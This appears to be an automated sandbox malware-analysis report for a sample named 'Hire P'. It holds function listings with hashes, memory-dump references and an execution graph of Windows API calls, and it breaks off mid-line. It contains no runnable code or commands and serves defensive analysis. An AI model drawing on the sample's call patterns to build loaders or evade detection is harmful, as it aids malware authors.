                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 922672ab94ba6354465037c7c3cf3c484482231c27de420555450aa569c40c59
                                                            • Instruction ID: 78dc6e7b2135329ceb29da6ea1737e7dc151aaaa8c1a106751b9d3188c46c1f0
                                                            • Opcode Fuzzy Hash: 922672ab94ba6354465037c7c3cf3c484482231c27de420555450aa569c40c59
                                                            • Instruction Fuzzy Hash: 0CF0FF78E04209DFCB40DFB9C4456AEBBF4EB45318F1094A99858E3345DB759A15CF81
                                                            Function 0846FF30 Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2460f3e35046255d427484ab8b49c36abe5b97ab188b54b3cab950ae2a69a10b
                                                            • Instruction ID: 75187f0798bc3885c0672870f7a90d30c0dff48e0fca05b857a984bad77b8d77
                                                            • Opcode Fuzzy Hash: 2460f3e35046255d427484ab8b49c36abe5b97ab188b54b3cab950ae2a69a10b
                                                            • Instruction Fuzzy Hash: FBF06274D052489FC744DF79D50515DBFB0EB0A310F0195DBD8A5E7611DB304655CF41
                                                            Function 0846D9E8 Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 398fb8ca4b894b5889e4f30e17132475fc195d619a13763cad4cac5af28829e1
                                                            • Instruction ID: 1b5db7912bb3acc6ac35cef072726b1f20585d42abb5f1e81a3b68411de2d1e8
                                                            • Opcode Fuzzy Hash: 398fb8ca4b894b5889e4f30e17132475fc195d619a13763cad4cac5af28829e1
                                                            • Instruction Fuzzy Hash: 25F049B0E093098FCB45CFB9D9042AEBFF1AB49310F0195AAD418E3311E7308A11CB92
                                                            Function 0846D9F8 Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dee6e06008c4b9981dbfa35ddcdf85a9bd3f59618ec20b686ac4f791d434fd67
                                                            • Instruction ID: 02a0a9169b619e389eea118ec03e98fa871ace176545467176da2228902cd9b5
                                                            • Opcode Fuzzy Hash: dee6e06008c4b9981dbfa35ddcdf85a9bd3f59618ec20b686ac4f791d434fd67
                                                            • Instruction Fuzzy Hash: B4F0A9B4E09309DFCB44DFA9D9456AEBBF5BB49311F10916AD818E3300EB319A51CF91
                                                            Function 084649A8 Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b1246336bfa9ca3fbe1c0c1e8852558ee15d0e65b607ec45e83e23a51af11a5
                                                            • Instruction ID: 55f3a2f3596ec36190f9c7c536c12074df50472207e2e4627fad65d11c17b6da
                                                            • Opcode Fuzzy Hash: 7b1246336bfa9ca3fbe1c0c1e8852558ee15d0e65b607ec45e83e23a51af11a5
                                                            • Instruction Fuzzy Hash: FBF07A7220111DFF9F015E85EC44CAF7F6EFB883A1B148015FA1582120CB368D72ABA1
                                                            Function 0846FAB8 Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b22e84701883fd1fd1b3d3c82d8c0f01c0d0e2d801de193ea699a903e085dbcc
                                                            • Instruction ID: c0c86c57e5bd98e10129409a71342953aeffd65807b82e274cdc894fcd826dc1
                                                            • Opcode Fuzzy Hash: b22e84701883fd1fd1b3d3c82d8c0f01c0d0e2d801de193ea699a903e085dbcc
                                                            • Instruction Fuzzy Hash: 2AF0A9B4D05209DFCB44DFA9D9455AEBBF5BB48311F10916AD858E3300EB709A15CF91
                                                            Function 08463D60 Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 57095fe0fb13786071d71c6442debf2d5ae03c14cf8dc99db4a6382f5e3453c7
                                                            • Instruction ID: 0c38fa477b1d11fb9009a494e710b64d06c6200d68974c9f853aa9d21f232c5d
                                                            • Opcode Fuzzy Hash: 57095fe0fb13786071d71c6442debf2d5ae03c14cf8dc99db4a6382f5e3453c7
                                                            • Instruction Fuzzy Hash: 02F0B432910B19C7C711FF6CE404485F7B5EFD5321B11863ED58967210EB32A894C790
                                                            Function 0846D358 Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9aa9a50dfddf136776b4edd423d1f6f529a6e2a0f395846ae08c5379473c83ba
                                                            • Instruction ID: 50cc07025ee96afc37234b8f9132a2d0335891ea0626a7ee3f83d4527965d1b3
                                                            • Opcode Fuzzy Hash: 9aa9a50dfddf136776b4edd423d1f6f529a6e2a0f395846ae08c5379473c83ba
                                                            • Instruction Fuzzy Hash: D5F0F6B0E14289DFCB11CFA8D40539DBFF09B06325F18859FD894A7341D7320591CB41
                                                            Function 0846D368 Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea3d9782b1628f5983fbde41b780d712a2bde12dbdcbfd4d8f1d27b1ff6898f9
                                                            • Instruction ID: 77988c39722ee98d979222574830cc541de50f971886c1828b85fa5561a4ef7e
                                                            • Opcode Fuzzy Hash: ea3d9782b1628f5983fbde41b780d712a2bde12dbdcbfd4d8f1d27b1ff6898f9
                                                            • Instruction Fuzzy Hash: 7DF0B7B4E14209DFDB44EFA9D5456ADBBF4AB49311F0498ABD818E3300E7715691CF41
                                                            Function 0846FF40 Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50881fd87d12fdd9ac5d8fd157c715b572f7cf5ce48a0413788131d795064953
                                                            • Instruction ID: 5f1cd79d7fe702c92fd7301c87f5972e072415749104524c3d18ad06df5c139a
                                                            • Opcode Fuzzy Hash: 50881fd87d12fdd9ac5d8fd157c715b572f7cf5ce48a0413788131d795064953
                                                            • Instruction Fuzzy Hash: 7DF0A4B4D142089FCB44DFA9E8455ADBBF4EB09311F0099ABD869E3340EB705A558F41
                                                            Function 08462660 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc2658edc19a290904d3d0917285d1ea8d580c2821d90bb61f89b441bd568eed
                                                            • Instruction ID: 71f6ff26f6ca538a193004ceed52c07f054526ea7064205ea2d3cf6e55d98e40
                                                            • Opcode Fuzzy Hash: fc2658edc19a290904d3d0917285d1ea8d580c2821d90bb61f89b441bd568eed
                                                            • Instruction Fuzzy Hash: 9FD05E3BA8512056E5209A15BCC17D93392FBC8326F2A8D6BE095E7248C42AD9964252
                                                            Function 0846E4C8 Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e0e683520e6bd12915b82a26e472998bc999b6cbdf74001e6294827e548d8d09
                                                            • Instruction ID: 73799785cbed320b5c04a382405a5d7ce675d3676ccb10b3534c21ba7ddd1802
                                                            • Opcode Fuzzy Hash: e0e683520e6bd12915b82a26e472998bc999b6cbdf74001e6294827e548d8d09
                                                            • Instruction Fuzzy Hash: F2E0C234C01208DBCB10EFB9C8842ADBBF89B40326F2044AED80563380E6705EA1DA82
                                                            Function 08462C5F Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d5d1ce665dfdcff3fbe4d06b5484f439558005d0961b48fa3862c8945ce46fa0
                                                            • Instruction ID: 80836ee9fd51ce36c16bfccfb91d3f3d3eccbc2c804803aae3264202bfc6eaf5
                                                            • Opcode Fuzzy Hash: d5d1ce665dfdcff3fbe4d06b5484f439558005d0961b48fa3862c8945ce46fa0
                                                            • Instruction Fuzzy Hash: 57D02B315001A82FC7025F5AE9008C2BFB49E56150305C1FBE008DF032C325881BCB51
                                                            Function 084680F8 Relevance: .0, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 124a637c1512e8a3ce699be28c99e50bcd741f36e9b48fe599c127659c644139
                                                            • Instruction ID: f0c859aa1f51a96532567712e7b1a1037943c4fcaa52a00628d15f4d76eb8df3
                                                            • Opcode Fuzzy Hash: 124a637c1512e8a3ce699be28c99e50bcd741f36e9b48fe599c127659c644139
                                                            • Instruction Fuzzy Hash: 64E05B71A55285CBDF605FB4E42C7AB3FD49B00756F0A80BDDA85CA282EA78C164D205
                                                            Function 08468108 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8265152146668e7a2156e75bd22a702dc5ffc783b733de9af9d1ef52a01f90b9
                                                            • Instruction ID: ece70da1ec333c41528b5fbfeb163efc91a1fddef7ca3bf6f7d29a6d82801a79
                                                            • Opcode Fuzzy Hash: 8265152146668e7a2156e75bd22a702dc5ffc783b733de9af9d1ef52a01f90b9
                                                            • Instruction Fuzzy Hash: 9FD01230A543089FDF105BB2D81C7677BE8EB00662F00843AE905C6350EB75D4A0C555
                                                            Function 08462C70 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7c575ffb02fd39229b98ad03ddbcdc09e256e2005c1fc96e08815a2e1c825ad5
                                                            • Instruction ID: f8a094f1028efeaa4424fd5e70b3a452d12b9f5b6447b05f6c78fa0f73a18ae7
                                                            • Opcode Fuzzy Hash: 7c575ffb02fd39229b98ad03ddbcdc09e256e2005c1fc96e08815a2e1c825ad5
                                                            • Instruction Fuzzy Hash: 48C012361000297B4B01AB85D800C86FBADAF49665304C056E5088B121D662E522DBD1
                                                            Function 08467A7F Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 839ce143505c5adcd901914023c3e618f286748adf310a3984e76649ace5a261
                                                            • Instruction ID: 0fe9db6b517c7d98b36fe919a10023ae82481cb71c99bf60143c0d3ad6327cd6
                                                            • Opcode Fuzzy Hash: 839ce143505c5adcd901914023c3e618f286748adf310a3984e76649ace5a261
                                                            • Instruction Fuzzy Hash: D4C0023A04110DBBCF025FC0E815AD93F26FB09750F048401FA5908161C7B38971FB91
                                                            Function 08467A80 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8067163fef37b573833526fc9826406923ddcf9e791d0dd5b5d3016d6acca0d2
                                                            • Instruction ID: f85546aeba67db84bd03d97d4e474598b9ae2d25a9504c23060de3eed1c38862
                                                            • Opcode Fuzzy Hash: 8067163fef37b573833526fc9826406923ddcf9e791d0dd5b5d3016d6acca0d2
                                                            • Instruction Fuzzy Hash: 93C0023A04020DBBCF025EC1EC15EDA3F2AFB09750F048401FA590416187B39970FBA1
                                                            Function 0846924C Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d572d12ec1c70c566de7ea3cae6fa9243231403cf1ea3f2b797863a7ae46d66f
                                                            • Instruction ID: 763349fae68842cff08a42af1779ef30929f6f4afee046708676529e7e74b4c4
                                                            • Opcode Fuzzy Hash: d572d12ec1c70c566de7ea3cae6fa9243231403cf1ea3f2b797863a7ae46d66f
                                                            • Instruction Fuzzy Hash: F6B092A9695602A66100A2645948B2FA441AFE5700B409812B248604988830A87AE52B

                                                            Non-executed Functions

                                                            Function 08807F70 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: #sD1
                                                            • API String ID: 0-12551166
                                                            • Opcode ID: 19fd51da52d7c2842e42a6ffbfc4d5859ad0da7fcd6cccbce4524abbf42d984a
                                                            • Instruction ID: 1548820c9d966b1f3ffa49b913b415653602859efa23503d2a4a30a149dd6856
                                                            • Opcode Fuzzy Hash: 19fd51da52d7c2842e42a6ffbfc4d5859ad0da7fcd6cccbce4524abbf42d984a
                                                            • Instruction Fuzzy Hash: A4E1FC74E102198FCB54DFA9C9909AEFBB2FF89305F24C169D814A7355DB31A982CF60
                                                            Function 04F10040 Relevance: .3, Instructions: 315COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1527936836.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_4f10000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ed55d7a49f38240797c2e2ac6dce3f3a40b0d13bfd651a4a290233161590eff
                                                            • Instruction ID: dc3c916d1918909a7f84bb02f0be360be594edb44a43f9e8868b74c44096b50a
                                                            • Opcode Fuzzy Hash: 5ed55d7a49f38240797c2e2ac6dce3f3a40b0d13bfd651a4a290233161590eff
                                                            • Instruction Fuzzy Hash: 8312A4B1C01746EADB10CF65F97C1893BB1FB85328B504209D2612B7E9DBBD19AACF44
                                                            Function 08806898 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 358b117b111b97bf09414163ebba1c771adc7c47e00eeec45fab9c63bf089fc2
                                                            • Instruction ID: de9254db4ea83a57f589b508120bb061e85113567c34e29b5d632fac4d60ef11
                                                            • Opcode Fuzzy Hash: 358b117b111b97bf09414163ebba1c771adc7c47e00eeec45fab9c63bf089fc2
                                                            • Instruction Fuzzy Hash: 7FE1F974E002198FCB14DFA9C9909AEFBB2FF89305F24C169D814AB355DB31A942CF61
                                                            Function 08808898 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80a9558593eee1d138c317512c95801fe7e7168ea327a0200790f91aab678881
                                                            • Instruction ID: 0713e9d3d66c27a7b3fdad31e382e53753f60f2543469c25a57e14fb48558991
                                                            • Opcode Fuzzy Hash: 80a9558593eee1d138c317512c95801fe7e7168ea327a0200790f91aab678881
                                                            • Instruction Fuzzy Hash: 7FE11874E011198FCB54DFA9C9909AEFBB2FF88305F24C169D814AB355DB31A982CF61
                                                            Function 08806CD0 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 024cfd0884f4321755fb759e22e476bbd559512811ac5d84b4ca75084ccb576a
                                                            • Instruction ID: 547a997ada890ce4d032b62c53fc28238607dc592aa7068c0a60e226958bda8f
                                                            • Opcode Fuzzy Hash: 024cfd0884f4321755fb759e22e476bbd559512811ac5d84b4ca75084ccb576a
                                                            • Instruction Fuzzy Hash: DAE1F974E002198FCB54DFA9C9909AEFBB2FF89305F24C169D814AB355DB31A942CF61
                                                            Function 08809038 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 63cad74006ae6778eadaed7b16d04a8ba9aae6fd8d386ae0fcce064cd883ebcc
                                                            • Instruction ID: 8c967e3a4f59e7c7c05dc1df28a8e992680b868de1bff081ca9cd77645834085
                                                            • Opcode Fuzzy Hash: 63cad74006ae6778eadaed7b16d04a8ba9aae6fd8d386ae0fcce064cd883ebcc
                                                            • Instruction Fuzzy Hash: 34E1F974E001198FCB14DFA9C9849AEFBB2FF89305F24D169D814AB356DB35A942CF60
                                                            Function 0282DF14 Relevance: .3, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 13bf80a1e7d7db9ed5850021cc50620c44fb9e0291cd60fc1ac5a0767820b131
                                                            • Instruction ID: 7d8d4a4b3e354ebe221d64f4112c8eea0e0ef53a71e2c4109817d40761aa8bac
                                                            • Opcode Fuzzy Hash: 13bf80a1e7d7db9ed5850021cc50620c44fb9e0291cd60fc1ac5a0767820b131
                                                            • Instruction Fuzzy Hash: 65A16D3AE002158FCF15DFB4C44059EBBB2FF88304B14456AE905EB665DB31E99ACF80
                                                            Function 04F10006 Relevance: .2, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1527936836.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_4f10000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d267946160a3b54e3958d98b503e51dbac2ac5f59d4a543ecb8c1d7fcdf4abac
                                                            • Instruction ID: d0312d004d3c6b73b8d708e317d313138313369509b1fe411f85e6b0aae642da
                                                            • Opcode Fuzzy Hash: d267946160a3b54e3958d98b503e51dbac2ac5f59d4a543ecb8c1d7fcdf4abac
                                                            • Instruction Fuzzy Hash: 53C124B1C01746AFDB10CF65F8781897BB1FB85328B514209D2616B3E9DBBC19AACF44
                                                            Function 08809030 Relevance: .1, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 57b60d5c49a7f56e430d34992f1ca4aa7e831e44d0c5b640c457e140ffb4bc54
                                                            • Instruction ID: 7df8ee040fcc3fed233cd2eb48fcde92cd1842f4590d35d451bf5ef2550913a5
                                                            • Opcode Fuzzy Hash: 57b60d5c49a7f56e430d34992f1ca4aa7e831e44d0c5b640c457e140ffb4bc54
                                                            • Instruction Fuzzy Hash: 6C511974E002198BCB14CFA9C9845AEFBF6FF89305F24C169D418AB356DB359942CFA1

                                                            Execution Graph

                                                            Execution Coverage:1.3%
                                                            Dynamic/Decrypted Code Coverage:4.8%
                                                            Signature Coverage:7.5%
                                                            Total number of Nodes:146
                                                            Total number of Limit Nodes:13
                                                            execution_graph 87358 1102b60 LdrInitializeThunk 87218 4249e3 87219 4249ff 87218->87219 87220 424a27 87219->87220 87221 424a3b 87219->87221 87222 42c633 NtClose 87220->87222 87228 42c633 87221->87228 87224 424a30 87222->87224 87225 424a44 87231 42e863 RtlAllocateHeap 87225->87231 87227 424a4f 87229 42c64d 87228->87229 87230 42c65e NtClose 87229->87230 87230->87225 87231->87227 87232 42f7e3 87233 42f7f3 87232->87233 87234 42f7f9 87232->87234 87237 42e823 87234->87237 87236 42f81f 87240 42c943 87237->87240 87239 42e83e 87239->87236 87241 42c95d 87240->87241 87242 42c96e RtlAllocateHeap 87241->87242 87242->87239 87359 424d73 87364 424d8c 87359->87364 87360 424e1f 87361 424dd7 87362 42e743 RtlFreeHeap 87361->87362 87363 424de7 87362->87363 87364->87360 87364->87361 87365 424e1a 87364->87365 87366 42e743 RtlFreeHeap 87365->87366 87366->87360 87367 42bc33 87368 42bc4d 87367->87368 87371 1102df0 LdrInitializeThunk 87368->87371 87369 42bc75 87371->87369 87243 414023 87244 41403d 87243->87244 87249 417793 87244->87249 87246 41405b 87247 4140a0 87246->87247 87248 41408f PostThreadMessageW 87246->87248 87248->87247 87250 4177b7 87249->87250 87251 4177be 87250->87251 87252 4177f3 LdrLoadDll 87250->87252 87251->87246 87252->87251 87253 41b2c3 87255 41b307 87253->87255 87254 41b328 87255->87254 87256 42c633 NtClose 87255->87256 87256->87254 87257 413ac3 87258 413adf 87257->87258 87261 42c8b3 87258->87261 87262 42c8cd 87261->87262 87265 1102c70 LdrInitializeThunk 87262->87265 87263 413ae5 87265->87263 87372 41a573 87373 41a5e5 87372->87373 87374 41a58b 87372->87374 87374->87373 87376 41e4c3 87374->87376 87377 41e4e9 87376->87377 87383 41e5e9 87377->87383 87385 42f913 87377->87385 87379 41e5e0 87379->87383 87391 4289f3 87379->87391 87380 41e57e 87380->87379 87381 42bc83 LdrInitializeThunk 87380->87381 87380->87383 87381->87379 87383->87373 87384 41e69b 87384->87373 87386 42f883 87385->87386 87387 42e823 RtlAllocateHeap 87386->87387 87390 42f8e0 87386->87390 87388 42f8bd 87387->87388 87389 42e743 RtlFreeHeap 87388->87389 87389->87390 87390->87380 87392 428a58 87391->87392 87393 428a93 87392->87393 87396 418b63 87392->87396 87393->87384 87395 428a75 87395->87384 87397 418b42 87396->87397 87398 418b72 87396->87398 87399 42c9e3 ExitProcess 87397->87399 87400 418b4b 87399->87400 87400->87395 87266 401b24 87267 401b47 87266->87267 87270 42fcb3 87267->87270 87273 42e2b3 87270->87273 87274 42e2f6 87273->87274 87285 407283 87274->87285 87276 42e30c 87277 401bf8 87276->87277 87288 41b0d3 87276->87288 87279 42e32b 87280 42e340 87279->87280 87303 42c9e3 87279->87303 87299 428303 87280->87299 87283 42e35a 87284 42c9e3 ExitProcess 87283->87284 87284->87277 87287 407290 87285->87287 87306 4164a3 87285->87306 87287->87276 87289 41b0ff 87288->87289 87330 41afc3 87289->87330 87292 41b144 87295 41b160 87292->87295 87297 42c633 NtClose 87292->87297 87293 41b12c 87294 41b137 87293->87294 87296 42c633 NtClose 87293->87296 87294->87279 87295->87279 87296->87294 87298 41b156 87297->87298 87298->87279 87300 428365 87299->87300 87302 428372 87300->87302 87341 418613 87300->87341 87302->87283 87304 42c9fd 87303->87304 87305 42ca0e ExitProcess 87304->87305 87305->87280 87308 4164c0 87306->87308 87307 4164d9 87307->87287 87308->87307 87310 42d083 87308->87310 87312 42d09d 87310->87312 87311 42d0cc 87311->87307 87312->87311 87317 42bc83 87312->87317 87318 42bc9d 87317->87318 87324 1102c0a 87318->87324 87319 42bcc9 87321 42e743 87319->87321 87327 42c993 87321->87327 87323 42d145 87323->87307 87325 1102c11 87324->87325 87326 1102c1f LdrInitializeThunk 87324->87326 87325->87319 87326->87319 87328 42c9ad 87327->87328 87329 42c9be RtlFreeHeap 87328->87329 87329->87323 87331 41b0b9 87330->87331 87332 41afdd 87330->87332 87331->87292 87331->87293 87336 42bd23 87332->87336 87335 42c633 NtClose 87335->87331 87337 42bd40 87336->87337 87340 